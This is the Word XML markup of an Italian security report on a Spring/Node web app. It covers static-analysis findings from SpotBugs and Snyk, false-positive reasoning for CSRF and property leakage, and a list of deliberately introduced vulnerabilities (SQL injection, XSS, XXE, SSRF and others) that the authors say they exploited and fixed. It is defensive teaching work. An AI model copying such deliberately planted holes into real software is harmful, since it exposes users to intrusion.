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npm</w:t>
      </w:r>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NodeJs</w:t>
      </w:r>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compose</w:t>
      </w:r>
      <w:r w:rsidRPr="009036AA">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> v1.29.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689355EE" w14:textId="6BFE43B0"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original</w:t>
      </w:r>
      <w:r w:rsidRPr="006A2C81">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Noto Sans"/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2C81">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">in cui è presente la versione originale dell’app su cui sono stati effettuati gli exploit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original_patched</w:t>
      </w:r>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new_vulnerabilities</w:t>
      </w:r>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r w:rsidRPr="006A2C81">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Noto Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>App_new_vulnerabilities_patched</w:t>
      </w:r>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1C6468A1" w:rsidR="009036AA" w:rsidRDefault="009036AA" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Per analizzare le vulnerabilità del back-end è stato usato </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2C81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SpotBugs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con l’estensione FindSecBugs mentre per il front-end è stato usato </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2C81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Snyk</w:t>
      </w:r>
      <w:r w:rsidR="003022AA">
        <w:t xml:space="preserve">. Entrambi i tool sono dei plugin di Eclipse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA21638" w14:textId="69C5884F" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82">
      <w:r>
        <w:t>L’analisi del front-end non ha riportato alcuna vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA2F772" w14:textId="10F6E0B3" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">L’analisi del back-end </w:t>
      </w:r>
      <w:r w:rsidR="00851F35">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00851F35" w:rsidRPr="006A2C81">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>App_original</w:t>
      </w:r>
      <w:r w:rsidR="00851F35" w:rsidRPr="006A2C81">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ha riportato 15 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3D5757EA" w:rsidR="001A56AB" w:rsidRPr="00C56823" w:rsidRDefault="001A56AB" w:rsidP="00C56823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring CSRF protection disabled</w:t>
            </w:r>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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Disabling Spring Security's CSRF protection is unsafe for standard web applications</w:t>
            </w:r>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Mass Assignment</w:t>
            </w:r>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persistent objects could be exploited by </w:t>
            </w:r>
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>attacker to read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Hard coded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76,84,96</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C1FCDAF" w14:textId="04DC72CF" w:rsidR="001A56AB" w:rsidRPr="00C56823" w:rsidRDefault="001A56AB" w:rsidP="00C56823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>56,70,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Hard coded password found</w:t>
            </w:r>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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property leakage 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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property leakage 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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property leakage 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FAB0D87" w14:textId="2342B390" w:rsidR="001A56AB" w:rsidRPr="00C56823" w:rsidRDefault="001A56AB" w:rsidP="00C56823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Fals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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property leakage 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270E7BA0" w14:textId="44ADB368" w:rsidR="001A56AB" w:rsidRPr="00C56823" w:rsidRDefault="001A56AB" w:rsidP="00C56823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Fals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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property could be leaked because a persistence class is directly exposed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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Predictable pseudo-random number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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>This random generator (java.util.Random) is predictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="467D961D" w14:textId="77777777" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82"/>
    <w:p w14:paraId="4E38EF26" w14:textId="679EB4B3" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Per i true positive viene mostrato l’exploit insieme al fix della vulnerabilità mentre per </w:t>
      </w:r>
      <w:r w:rsidR="003961B0">
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> false positive è stato spiegato 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nelle web application e sono le seguenti: SQL Injection, Cross-site Scripting (XSS Stored), Path Traversal, Malicious Code Injection, XML External Entities (XXE), Insecure Deserialization, Server-side Request Forgery (SSRF), Regex DOS, Insecure Direct Object References (IDOR), Unvalidated Redirect, Performing string modification after validation. Di ognuna di queste vulnerabilità è stato fatto l’exploit, fornendo il payload utilizzato e successivamente il fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245928F8" w14:textId="772A2986" w:rsidR="00844BCD" w:rsidRDefault="00245DF3" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Di seguito è mostrato l’elenco e la spiegazione nel dettaglio di tutte le vulnerabilità. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678DBBBA" w14:textId="646F2DBA" w:rsidR="00792C82" w:rsidRDefault="00792C82" w:rsidP="00792C82"/>
    <w:p w14:paraId="296E1604" w14:textId="77777777" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="00792C82"/>
    <w:p w14:paraId="2250433C" w14:textId="5BA3D7E8" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00792C82"/>
    <w:p w14:paraId="379ED7B1" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A65E4" w14:textId="77777777" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="00792C82"/>
    <w:p w14:paraId="5D748C2A" w14:textId="26754968" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00792C82"/>
    <w:p w14:paraId="7C8DE375" w14:textId="279FA110" w:rsidR="00922898" w:rsidRPr="0006778F" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Falsi positivi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41306172" w14:textId="77777777" w:rsidR="00922898" w:rsidRPr="0006778F" w:rsidRDefault="00922898" w:rsidP="0006778F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78173744" w14:textId="4CDF35D7" w:rsidR="00922898" w:rsidRDefault="0006778F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SecurityConfiguration.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621216A6" w14:textId="06BBF949" w:rsidR="0006778F" w:rsidRDefault="0006778F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A5AE5" w14:textId="77777777" w:rsidR="0006778F" w:rsidRPr="00DE1106" w:rsidRDefault="0006778F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB01847" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>È una vulnerabilità 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57A016E9" w14:textId="77777777" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339BCE8C" w14:textId="146849C2" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nela nostra app, </w:t>
      </w:r>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> è disabilitato poiché l’autenticazione avviene tramite </w:t>
      </w:r>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bearer Token</w:t>
      </w:r>
      <w:r>
        <w:t>, i quali non sono automaticamente inclusi nelle richieste Cross-Site. Di fatti, a differenza dei cookie di sessione, questi Token non vengono inviati automaticamente dal browser con ogni richiesta, bensì devono essere inclusi esplicitamente nell’Authorization Header della richiesta http. Inoltre</w:t>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’applicazione fa uso di una politica CORS che accetta richieste soltanto da domini specifici, rendendo quindi la vulnerabilità un falso positivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39459885" w14:textId="104ADF0B" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5722543D" w14:textId="2658A970" w:rsidR="00922898" w:rsidRPr="0006778F" w:rsidRDefault="00922898" w:rsidP="0006778F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property leakage 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B069986" w14:textId="7D10E669" w:rsidR="00922898" w:rsidRDefault="0006778F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2CC05D" w14:textId="04C216C6" w:rsidR="0006778F" w:rsidRDefault="0006778F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64393288" w14:textId="06E65D5C" w:rsidR="0006778F" w:rsidRDefault="0006778F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3F032E" w14:textId="71C42251" w:rsidR="000F4F60" w:rsidRDefault="000F4F60" w:rsidP="000F4F60">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Questa vulnerabilità si ha quando vengono esposti dei dati sensibili degli oggetti all’esterno, mostrando informazioni non necessarie e violando la privacy. Nel nostro caso alcuni sono risultati in dei falsi positivi e altri in veri positiv</w:t>
      </w:r>
      <w:r>
        <w:t>i, trattati in seguito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273CA311" w14:textId="7413B5BC" w:rsidR="00922898" w:rsidRDefault="000F4F60" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo caso, i</w:t>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:t xml:space="preserve">l metodo in analisi è il metodo </w:t>
      </w:r>
      <w:r w:rsidR="00922898" w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saved()</w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00922898" w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:t xml:space="preserve"> e risulta un </w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t>false positive perché tutti gli attributi dell’oggetto vengono utilizzati</w:t>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:t xml:space="preserve">, come mostrato nella schermata web developer in </w:t>
      </w:r>
      <w:r w:rsidR="005E267F">
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:t xml:space="preserve">igura </w:t>
      </w:r>
      <w:r w:rsidR="005E267F">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A1B5F3" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C48808A" w14:textId="790EFA40" w:rsidR="00922898" w:rsidRPr="008302E7" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251748352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EA351B3" wp14:editId="2D1902D6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-458470</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1005205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7037070" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="185286184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7423A917" w14:textId="74F0A638"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1</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00843A5F">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351B3" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Casella di testo 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-36.1pt;margin-top:79.15pt;width:554.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7423A917" w14:textId="74F0A638" w:rsidR="005E267F" w:rsidRPr="00AF24B9"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1</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00843A5F">
                        <w:t>HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00B90C8B" wp14:editId="5ACB2B2B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>109855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7037070" cy="8382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070" cy="838200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0006778F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19369045" wp14:editId="1E168649">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-367030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>982345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7037070" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="175775798" name="Casella di testo 1"/>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14:paraId="6F7FD4F8" w14:textId="53BEE2DF" w:rsidR="0006778F" w:rsidRPr="00490AC3" w:rsidRDefault="0006778F" w:rsidP="0006778F">
                            <w:pPr>
                              <w:pStyle w:val="Didascalia"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00DC4D59">
                              <w:t>Hobby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9045" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-28.9pt;margin-top:77.35pt;width:554.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NzGAIAAD8EAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L3ZarB2C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lv8+vb/JZCkmI3159j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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6F7FD4F8" w14:textId="53BEE2DF" w:rsidR="0006778F" w:rsidRPr="00490AC3" w:rsidRDefault="0006778F" w:rsidP="0006778F">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DC4D59">
                        <w:t>HobbyController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00922898">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64782544" w14:textId="3077CE7B" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="703A9A8F" w14:textId="4D65D76E" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="13485FA1" w14:textId="2F3CE2D2" w:rsidR="00922898" w:rsidRDefault="0006778F" w:rsidP="00922898">
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A896ABE" w14:textId="75D32CC4" w:rsidR="00922898" w:rsidRDefault="00922898" w:rsidP="00922898"/>
    <w:p w14:paraId="56644361" w14:textId="77777777" w:rsidR="005E267F" w:rsidRDefault="005E267F" w:rsidP="00922898"/>
    <w:p w14:paraId="3EC462F1" w14:textId="44F07B04" w:rsidR="00922898" w:rsidRDefault="005E267F" w:rsidP="00922898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251746304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69DE32A1" wp14:editId="074F57C0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-445135</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3151505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7002780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="116495616"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13BE9509" w14:textId="64A75B2C" w:rsidR="005E267F" w:rsidRPr="000E7CB4" w:rsidRDefault="005E267F" w:rsidP="005E267F">
                            <w:pPr>
                              <w:pStyle w:val="Didascalia"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figur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32A1" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:-35.05pt;margin-top:248.15pt;width:551.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kGQIAAD8EAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L3YyrC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LzN89ntHYUkxW4+foo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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="13BE9509" w14:textId="64A75B2C" w:rsidR="005E267F" w:rsidRPr="000E7CB4" w:rsidRDefault="005E267F" w:rsidP="005E267F">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figura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8AC2E34" wp14:editId="5B6E3E99">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-445135</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3151505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7002780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="849049857" name="Casella di testo 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5980420A" w14:textId="14EEB9A6"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2</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
